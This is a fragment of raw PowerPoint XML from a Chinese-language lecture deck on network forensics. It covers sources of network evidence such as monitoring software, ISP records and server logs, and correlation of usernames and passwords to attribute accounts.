                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址以及分配的时间等信息。</a:t>
            </a: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6.3.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其它来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1725222"/>
            <a:ext cx="7200800" cy="1431161"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③网络监控软件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在网络中它观测网络通信并收集统计信息，例如它可以记录一个特定网段内网络流的高层次信息，包括各种协议消耗的带宽总量等。还可以收集网络活动更详细的细节，比如每一个包的负载大小、源和目的的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址和端口等。一些可管理的交换机和其他网络设备就具有这样的能力。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.3.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其它来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1886805"/>
            <a:ext cx="7200800" cy="1107996"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（互联网服务提供商）记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作为日常工作的一部分或者调查异常活动，比如特别大的数据通信以及明显的攻击行为时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>要收集网络通信相关数据。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的记录不会保留很长时间，通常几天或几小时，但执法机关依照程序，可以要求他们保留更长的时间。</a:t>
            </a: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6.3.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其它来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1886806"/>
            <a:ext cx="7200800" cy="1107996"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序同样记录一些成功或失败的使用尝试的信息，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Internet Information Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）可以记录客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址和端口等网络连接相关信息。记录的数据域依据应用程序的不同而相差很大。</a:t>
            </a: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6.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证的定义和特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1491630"/>
            <a:ext cx="7165712" cy="2839239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络取证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>同样要求对潜在的、有法律效力的证据的确定与获取，但从当前的研究和应用来看，更强调对网络的动态信息收集和网络安全的主动防御。同时，网络取证也要应用计算机取证与司法鉴定的一些方法和技术。目前，网络取证的相关技术包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的获取和识别技术、身份认证技术、电子邮件的取证和鉴定技术、网络监视技术、数据挖掘和过滤技术、漏洞扫描技术、人工智能、机器学习、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术、蜜阱技术、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和专家系统等。在基于网络的犯罪日益猖獗的今天，网络取证技术在计算机取证与司法鉴定技术中占有举足轻重的地位。</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6.3.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其它来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1923678"/>
            <a:ext cx="7200800" cy="784830"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机的网络配置和连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从主机上同样可以收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口以及哪一个在侦听等信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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608877" y="1337721"/>
            <a:ext cx="2055371" cy="156966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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.4</a:t>
            </a:r>
            <a:endPar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614" y="2115293"/>
            <a:ext cx="1781944"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3664248" y="2114659"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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网络通信数据的收集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="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4"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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="548412"/>
            <a:ext cx="7200800" cy="4278094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、关联分析技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在电子数据的鉴定过程中，可以应用关联分析技术，对各种线索进行关联分析，发掘同一事件的不同数据间的联系。在关联分析时，可以从以下方面考虑：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    ①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户名关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特定对象在选取用户名时，可能会采用自己喜欢的某个词或者与自己有直接关系的词（如：姓名、姓名拼音、姓名拼音缩写、地址、生日等）作为用户名，因此，特定对象的不同用户名间，可能会有相同或相似之处。对于不常见的同名账号，基本上可以认定是同一个人使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特定对象在选取密码时，可能会采用与自己有直接关系的一段数字字母（如：自己生日、好友生日、电话号码、手机号码、姓名、姓名缩写等）或者自己喜欢的某个词，因此，对于特定对象的多个密码之间，可能会具有一些相同或相似的特征。对于使用相同的复杂密码的账号，基本上可以认定是同一个人使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
